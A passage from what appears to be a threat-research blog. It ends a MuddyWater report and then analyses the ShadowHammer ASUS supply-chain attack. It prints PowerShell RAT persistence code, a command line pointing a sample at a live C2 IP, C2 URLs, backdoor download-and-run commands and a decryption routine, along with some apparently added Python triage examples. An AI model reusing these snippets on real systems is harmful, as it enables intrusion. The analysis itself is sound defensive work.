C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd

Chinese language strings

Multiple Chinese strings can be found in some PowerShell RAT payloads (such as Ffb8ea0347a3af3dd2ab1b4e5a1be18a) that seem to have been left in on purpose, probably to make attribution harder.

if (IQQXIJFBIIVIOKFCSXFHBBQFFDMWTL -p "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -k "MalwareDefenderSDK" -v "wscript $tempPath$filenamePathV" -eq "error"){ Write-Host "无法访问本地计算机寄存器" } try{ schtasks /Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareDefenderSDK /TR "wscript $tempPath$filenamePathV" /F } catch{ Write-Host "任务计划程序访问被拒绝" } } [System.Net.WebResponse] $resp = $webreq.GetResponse(); if ($resp -ne $null){ $data = $resp.GetResponseStream(); [System.IO.StreamReader] $res_data = New-Object System.IO.StreamReader $data; [String] $result = $res_data.ReadToEnd(); } } catch { Write-Host '无法连接到网址,请等待龙...' $result = "error" }

Russian strings and impersonation of “RXR Saudi Arabia” hacking group

In another PowerShell sample (md5: e684aa1c6e51f4696a836ecb6ff1e143, filename: km.ps1), attackers used Russian words as the RC4 key when establishing a connection to the C2 server (78.129.139[.]134).

km -ip 78.129.139.134 -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Moreover, IP 78.129.139[.]134 is used as a C2 for other samples as well. Interestingly, when visiting the C2, it displays a blank webpage whose HTML source code shows a strange HTML tag value that suggests attackers have tried to impersonate a Saudi Hacking group called RXR Saudi Arabia.

Conclusion

MuddyWater attacks have been expanding in recent years in terms of targets and malware functionality. The attackers seem to be reasonably well-equipped for their goals, with relatively simple and expendable tools to infiltrate victims and exfiltrate data, mostly using Python and PowerShell-based tools. These tools also seem to allow them flexibility to adapt and customize the toolset for victims.

This continuous capability to steadily adjust and enhance attacks, adapting well to the changing Middle Eastern geopolitical scene, seems to make this actor a solid adversary that keeps growing. We expect it to keep developing or acquiring additional tools and abilities, possibly including zero-days. Nevertheless, its current OPSEC should be considered poor – for example, leaving details which could reveal different types of information about them.

For more information about the attacks and the indicators of compromise, please contact: intelreports@kaspersky.com

Operation ShadowHammer: a high-profile supply chain attack

23 April, 2019 - 12:00

In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers.

At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”.

Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers.

It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.

We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).

The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though.

Technical details

The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below.

In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further.

Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb“. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers.

A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below.

We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present.

Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier?

Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function “___crtExitProcess”. The malicious code executes a shellcode loader instead of the standard function “___crtCorExitProcess”:

This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection.

The loader code copies another block of encrypted shellcode from the file’s resource section (of the type “EXE”) to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8.

We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018.

ShadowHammer downloader

The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. It has the following properties:

  • MD5: 63f2fe96de336b6097806b22b5ab941a
  • SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a
  • SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a
  • Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea
  • File Size: 1,662,464 bytes
  • File Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • Link Time: 2018.07.10 05:58:19 (GMT)

The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so that the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010.

The core function of this executable is in a subroutine which is called from WinMain, but also executed directly via a hardcoded offset from the code injected into ASUS Live Updater.

The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs.

In other words, the malware iterates through the table of hashes and compares each entry to the MD5 hashes of the local adapters’ MAC addresses. If there is a match, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the matching entry as a parameter in the request to identify the victim. The server response is expected to be executable shellcode, which is placed in newly allocated memory and started.

Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries was changing, some of the entries were present in all of the tables.

For all users whose MAC did not match expected values, the code would create an INI file located two directory levels above the current executable and named “idx.ini”. Three values were written into the INI file under the [IDX_FILE] section:

[IDX_FILE]
XXX_IDN=YYYY-MM-DD
XXX_IDE=YYYY-MM-DD
XXX_IDX=YYYY-MM-DD

where YYYY-MM-DD is a date one week ahead of the current system date.

The code injected by the attackers was discovered on the computers of over 57,000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of affected users around the world remains unknown.
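As an added example (not code from the report or from the malware), the following Python triage helper reproduces the selection logic described above, MD5 of each adapter MAC compared against a table of hard-coded hashes with some entries arranged as pairs, and recovers the write date from a non-target host's idx.ini. The exact byte string the downloader hashed (separator, letter case) is not stated on this page, so the canonical MAC form is an assumption exposed as parameters; the physical MAC and the hash table are constructed fixtures built around the two MAC addresses quoted in the report.

```python
"""Host triage for the ShadowHammer MAC-address targeting and idx.ini marker.

Added example, not code from the report or from the malware. The hashed MAC
format is an assumption (dash-separated, upper case by default).
"""
import hashlib
from datetime import date, timedelta
from typing import Iterable, List, Optional, Sequence, Tuple, Union

HashEntry = Union[str, Tuple[str, ...]]


def canonical_mac(mac: str, sep: str = "-", upper: bool = True) -> str:
    """Normalise '0c:5b:8f:27:9a:64' style input to the assumed hashed form."""
    digits = "".join(c for c in mac if c.isalnum())
    if len(digits) != 12 or any(c not in "0123456789abcdefABCDEF" for c in digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    digits = digits.upper() if upper else digits.lower()
    return sep.join(digits[i:i + 2] for i in range(0, 12, 2))


def mac_hash(mac: str, **fmt) -> str:
    """MD5 of the canonical MAC string, as the downloader computes per adapter."""
    return hashlib.md5(canonical_mac(mac, **fmt).encode("ascii")).hexdigest()


def match_targets(host_macs: Iterable[str], table: Sequence[HashEntry],
                  **fmt) -> List[str]:
    """Return the first hash of every table entry satisfied by this host.

    A paired entry only matches when all of its hashes are present, which is
    how a shared virtual-adapter MAC (e.g. the VMware VMNet8 one) is tied to
    the real Ethernet card. The returned hash is the value the downloader
    sends to the C2 to identify the victim.
    """
    local = {mac_hash(m, **fmt) for m in host_macs}
    hits: List[str] = []
    for entry in table:
        needed = (entry,) if isinstance(entry, str) else tuple(entry)
        if needed and all(h.lower() in local for h in needed):
            hits.append(needed[0].lower())
    return hits


def idx_ini_written_on(text: str) -> Optional[date]:
    """Recover the system date on which a ShadowHammer idx.ini was written.

    The three XXX_ID? values hold a date one week ahead of the system date at
    write time; returns None unless all three are present, parse, and agree.
    """
    section = None
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "IDX_FILE" and "=" in line:
            k, v = line.split("=", 1)
            values[k.strip()] = v.strip()
    try:
        dates = {date.fromisoformat(values[k])
                 for k in ("XXX_IDN", "XXX_IDE", "XXX_IDX")}
    except (KeyError, ValueError):
        return None
    if len(dates) != 1:
        return None
    return dates.pop() - timedelta(days=7)


# Constructed fixture: the two MACs quoted on this page plus a made-up card.
VMNET8_MAC = "00-50-56-C0-00-08"      # VMware VMNet8, shared by many hosts
HUAWEI_MAC = "0C-5B-8F-27-9A-64"      # Huawei E3372h virtual adapter
PHYSICAL_MAC = "00-11-22-33-44-55"    # constructed placeholder, not from the report
SAMPLE_TABLE: List[HashEntry] = [
    (mac_hash(VMNET8_MAC), mac_hash(PHYSICAL_MAC)),  # pair: VM adapter + real card
    mac_hash(HUAWEI_MAC),                             # single entry
]
SAMPLE_IDX_INI = ("[IDX_FILE]\nXXX_IDN=2018-08-15\n"
                  "XXX_IDE=2018-08-15\nXXX_IDX=2018-08-15\n")  # constructed

if __name__ == "__main__":
    print(match_targets([VMNET8_MAC], SAMPLE_TABLE))                # no hit on its own
    print(match_targets([VMNET8_MAC, PHYSICAL_MAC], SAMPLE_TABLE))  # pair satisfied
    print(idx_ini_written_on(SAMPLE_IDX_INI))                       # 2018-08-08
```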

Digital signature abuse

A lot of computer security software deployed today relies on integrity control of trusted executables. Digital signature verification is one such method. In this attack, the attackers managed to get their code signed with a certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed.

First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints:

  • 0ff067d801f7daeeae842e9fe5f610ea
  • 05e6a0be5ac359c7ff11f4b467ab20fc

The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (i.e. ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke these certificates.

All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts.

Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, “Certificate Validity Period”, which can help us to understand roughly the timeframe of the operation. Apparently, because the certificate that the attackers relied on expired in 2018 and therefore had to be reissued, they used two different certificates.

Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA.

The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for “Extended Validation” and provides for stricter requirements for the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate.

This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know about all software with malware injection they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (i.e. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We have immediately notified ASUS about this and provided evidence as required.

ASUS-related attack samples

Using decrypted shellcode and through code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties:

  • they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted
  • they have a forgotten PDB path of “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”
  • the shellcode from all of these samples connects to the same C2: asushotfix[.]com
  • all samples were compiled between June and July 2018
  • the samples have been detected on computers all around the globe

The hashes of these related samples include:


These files are dropped by larger setup files / installers, signed by an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea, valid from 2015-07-27 till 2018-08-01).

The hashes of the larger installers/droppers include:

  • 0f49621b06f2cdaac8850c6e9581a594
  • 17a36ac3e31f3a18936552aff2c80249

At this point, we do not know how they were used in these attacks and whether they were delivered via a different mechanism. These files were located in a “TEMP” subfolder for ASUS Live Updater, so it is possible that the software downloaded these files directly. Locations where these files were detected include:

  • asus\asus live update\temp\1\Setup.exe
  • asus\asus live update\temp\2\Setup.exe
  • asus\asus live update\temp\3\Setup.exe
  • asus\asus live update\temp\5\Setup.exe
  • asus\asus live update\temp\6\Setup.exe
  • asus\asus live update\temp\9\Setup.exe

Public reports of the attack

While investigating this case, we were wondering how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came by a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message:

The message claims to be a “ASUS Critical Update” notification, however, the item does not have a name or version number.

Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal:

The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded the ASUS Live Update itself, as opposed to the update it received from the Internet. Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018.

In September 2018, another Reddit user, FabulaBerserko also posted a message about a suspicious ASUS Live update:

Asus_USA replied to FabulaBerserko with the following message, suggesting he run a scan for viruses:

In his message, the Reddit user FabulaBerserko talks about an update listed as critical, however without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB “AsusShellCode.pdb” have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018.

Targets by MAC address

We managed to crack all of the 600+ MAC address hashes and analyzed distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. It turns out that the distribution is uneven and certain vendors are a higher priority for the attackers. The chart below shows statistics we collected based on network adapter manufacturers’ names:

Some of the MAC addresses included on the target list were rather popular; e.g. 00-50-56-C0-00-08 belongs to the VMware virtual adapter VMNet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers paired it with a secondary MAC address from the real Ethernet card, which made targeting more precise. However, it tells us that one of the targeted users used VMware, which is rather common for software engineers (for testing their software).

Another popular MAC was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device shared the same MAC address.

Interaction with ASUS

The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all details of what was known about the attack and hoping for cooperation. The following is a timeline of the discovery of this supply-chain attack, together with ASUS interaction and reporting:

  • 29-Jan-2019 – initial discovery of the compromised ASUS Live Updater
  • 30-Jan-2019 – created preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei
  • 31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected.
  • 01-Feb-2019 – ASUS provides an archive of all ASUS Live Updater tools beginning from 2018. None of them were infected, and they were signed with different certificates.
  • 14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack
  • 20-Feb-2019 – update conf call with ASUS to provide newly found details about the attack
  • 08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack
  • 08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS.

We appreciate a quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New Year). This helped us to confirm that the attack was in a deactivated stage and there was no immediate risk to new infections and gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users’ computers.

Non-ASUS-related cases

In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia.

One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called “Infestation: Survivor Stories”. It is a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, “the game was panned by critics and is considered one of the worst video games of all time”. The game servers were taken offline on December 15, 2016.

The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title of “The War Z” and released by OP Productions, which put it in the Steam store in December 2012. On April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public.

It seems that certain videogame companies picked up this available code and started making their own versions of the game. One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web & IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website. The homepage of Innovative Extremist also listed Electronics Extreme as one of their partners.

Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked. However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it. And now the game seems to be causing trouble again. We found at least three samples of Infestation signed by Electronics Extreme with a certificate that, once again, needs to be revoked.

We believe that a poorly maintained development environment, leaked source code, as well as vulnerable production servers were at the core of the bad luck chasing this videogame. Ironically, this game about infestation brought only trouble and a serious infection to its developers.

Several executable files from the popular FPS videogame PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as of early April, Zepetto seems to have stopped using the certificate at the end of February 2019.

While some details about this case were announced in March 2019 by our colleagues at ESET, we have been working on this in parallel with ESET and uncovered some additional facts.

All these cases involve digitally signed binaries from three vendors based in three different Asian countries. They are signed with different certificates, each with its own chain of trust. What is common to these cases is the way the binaries were trojanized.

The code injection happened through modification of commonly used functions such as the CRT (C runtime), which is similar to the ASUS case. However, the implementation is very different in the case of the videogame companies. In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, nor did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases it starts at the beginning of the code section, as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victims’ projects or injected the malware on the premises of the breached companies at the time of project compilation.

Payload from non-ASUS-related cases

The payload included into the compromised videogames is rather simple. First of all, it checks whether the process has administrative privileges.

Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread that carries out the malicious logic.

The file contains a hardcoded miniconfig—an annotated example of the config is provided below.

  • C2 URL: https://nw.infestexe[.]com/version/last.php
  • Sleep time: 240000
  • Target Tag: warz
  • Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe

Apparently, the backdoor was specifically created for this target, which is confirmed by an internal tag (the previous name of the game is “The War Z”).

If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed. It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution.

After all checks are done, the malware gathers information about the system including:

  • Network adapter MAC address
  • System username
  • System hostname and IP address
  • Windows version
  • CPU architecture
  • Current host FQDN
  • Domain name
  • Current executable file name
  • Drive C: volume name and serial number
  • Screen resolution
  • System default language ID

This information is concatenated in one string using the following string template: “%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s”.

Then the malware crafts a host identifier, which is made up of the C drive serial number string XOR-ed with the hardcoded string “*&b0i0rong2Y7un1” and encoded with the Base64 algorithm. Later on, the C: serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties.

The malware uses HTTP for communication with a C2 server and crafts HTTP headers on its own. It uses the following hardcoded User-Agent string: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”

Interestingly, when the malware identifies the Windows version, it uses a long list:

  • Microsoft Windows NT 4.0
  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows Me
  • Microsoft Windows 2000e
  • Microsoft Windows XP
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 R2
  • Microsoft Windows Vista
  • Microsoft Windows Server 2008
  • Microsoft Windows 7
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows 8
  • Microsoft Windows Server 2012
  • Microsoft Windows 8.1
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows 10
  • Microsoft Windows Server 2016

The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute.

The following commands were discovered:

  • DownUrlFile – download URL data to file
  • DownRunUrlFile – download URL data to file and execute it
  • RunUrlBinInMem – download URL data and run as shellcode
  • UnInstall – set registry flag to prevent malware start

The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, and the files should be discoverable through forensic analysis.

Similarities between the ASUS attack and the non-ASUS-related cases

Although the ASUS case and the videogame industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes (in trojanized games) resembles the one used in the backdoored ASUS Updater tool.

ASUS case:

    hash = 0
    for c in string:
        hash = hash * 0x21
        hash = hash + c
    return hash

Other cases:

    hash = 0
    for c in string:
        hash = hash * 0x83
        hash = hash + c
    return hash & 0x7FFFFFFF

Pseudocode of API hashing algorithm of ASUS vs. other cases

Besides that, our behavior engine identified that the ASUS and other related samples are among the very few cases where IPHLPAPI.dll was used from within a shellcode embedded into a PE file.

In the case of ASUS, the function GetAdaptersAddresses from the IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from the IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to remote C&C servers.
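To illustrate the two API-hashing routines above and how an analyst resolves a hash found in a sample back to the IPHLPAPI.dll export it refers to, here is an added Python example (not Kaspersky's code). It assumes hashing runs over the ASCII bytes of the name, that the ASUS variant wraps at 32 bits (the pseudocode shows no mask), and the export list is a constructed subset of IPHLPAPI.dll's exports.

```python
"""Added example: the ASUS-style and game-style API hashes plus a resolver.
Assumptions (not stated on the page): ASCII input bytes, 32-bit wrap-around
for the ASUS variant, and a constructed subset of IPHLPAPI.dll exports."""
from typing import Callable, Dict, Iterable, Optional

MASK32 = 0xFFFFFFFF


def hash_asus(name: str) -> int:
    """ASUS Live Updater variant: h = h * 0x21 + c per character.
    Assumed to run in a 32-bit register, hence the wrap-around mask."""
    h = 0
    for c in name.encode("ascii"):
        h = (h * 0x21 + c) & MASK32
    return h


def hash_games(name: str) -> int:
    """Trojanized-game variant: h = h * 0x83 + c, result masked to 31 bits.
    Reducing intermediates modulo 2**32 does not change the low 31 bits,
    so the single final mask reproduces a 32-bit implementation exactly."""
    h = 0
    for c in name.encode("ascii"):
        h = h * 0x83 + c
    return h & 0x7FFFFFFF


# Constructed subset of IPHLPAPI.dll export names: the two functions the
# samples import plus a few neighbours, to make the resolver realistic.
IPHLPAPI_EXPORTS = [
    "GetAdaptersAddresses", "GetAdaptersInfo", "GetIfTable",
    "GetIpAddrTable", "GetNetworkParams", "SendARP",
]


def build_table(names: Iterable[str],
                hasher: Callable[[str], int]) -> Dict[int, str]:
    """Precompute hash -> export name for one of the two hash variants."""
    return {hasher(n): n for n in names}


def resolve(h: int, table: Dict[int, str]) -> Optional[str]:
    """Map a hash constant lifted from a sample to an export name, if known."""
    return table.get(h)


if __name__ == "__main__":
    asus_tbl = build_table(IPHLPAPI_EXPORTS, hash_asus)
    game_tbl = build_table(IPHLPAPI_EXPORTS, hash_games)
    for n in ("GetAdaptersAddresses", "GetAdaptersInfo"):
        print(f"{n}: ASUS 0x{hash_asus(n):08x}  games 0x{hash_games(n):08x}")
    # Round trip: a hash seen in the game samples resolves to its export.
    print(resolve(hash_games("GetAdaptersInfo"), game_tbl))
```

Running the script against the hash constants lifted from a sample turns an opaque 32-bit value into the export name, which is how the GetAdaptersAddresses/GetAdaptersInfo usage described above is recognised.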

ShadowPad connection

While investigating this case, we worked with several companies that had been abused in this wave of supply chain attacks. Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect.

Our analysis of the sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea) that was deployed by the attackers on the company’s internal network during the breach, revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017.

The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer:

The newly updated version of ShadowPad follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As with ShadowPad, the attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain.

The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. Such online documents, which we extracted from several backdoors, were created by the same user under the name Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson from Valve Corporation.

These online documents contained an ASCII block of text marked as an RSA private key during the time of operation. We noticed that inside the private key, normally encoded with base64, there was an invalid character injection (the symbol “$”):

The message between the two “$” characters in fact contained an encrypted second-stage C2 URL.

We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018:

  • Jul 31: UDP://103.19.3[.]17:443
  • Aug 13: UDP://103.19.3[.]17:443
  • Oct 08: UDP://103.19.3[.]17:443
  • Oct 09: UDP://103.19.3[.]17:443
  • Oct 22: UDP://117.16.142[.]9:443
  • Nov 20: HTTPS://23.236.77[.]177:443
  • Nov 21: UDP://117.16.142[.]9:443
  • Nov 22: UDP://117.16.142[.]9:443
  • Nov 23: UDP://117.16.142[.]9:443
  • Nov 27: UDP://117.16.142[.]9:443
  • Nov 27: HTTPS://103.19.3[.]44:443
  • Nov 27: TCP://103.19.3[.]44:443
  • Nov 27: UDP://103.19.3[.]44:1194
  • Nov 27: HTTPS://23.236.77[.]175:443
  • Nov 29: HTTPS://23.236.77[.]175:443
  • Nov 29: UDP://103.19.3[.]43:443
  • Nov 30: HTTPS://23.236.77[.]177:443

The IP address range 23.236.64.0-23.236.79.255 belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA.

Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk university (konkuk.ac.kr). This IP address range has been previously reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university’s network to host their C2 infrastructure.

The last one, 103.19.3[.]44, is located in Japan but seems to belong to another Chinese ISP known as “xTom Shanghai Limited”. When connected to directly by IP address, the server displays an error page from Chinese web management software called BaoTa (“宝塔” in Chinese):

PlugX connection

While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms used in multiple malware samples, including many of PlugX. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (e.g. md5: 5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012, if the compilation timestamp is anything to trust.

Not only do both pieces of code share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444), they also implement identical algorithms to decrypt data, summarized in the Python function below.

    from ctypes import c_uint32
    from struct import unpack

    def decrypt(data: bytes) -> bytes:
        # The first DWORD of the buffer seeds all four state words.
        p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]
        decdata = bytearray()
        # The loop starts at offset 0, so the seed bytes are XOR-ed as well.
        for byte in data:
            # Each state word evolves independently with 32-bit wrap-around;
            # the constants are the ones shared with PlugX.
            p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value
            p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value
            p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value
            p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value
            # The keystream byte is the sum of the low bytes of the four words.
            key = (p1 % 256 + p2 % 256 + p3 % 256 + p4 % 256) % 256
            decdata.append(byte ^ key)
        return bytes(decdata)

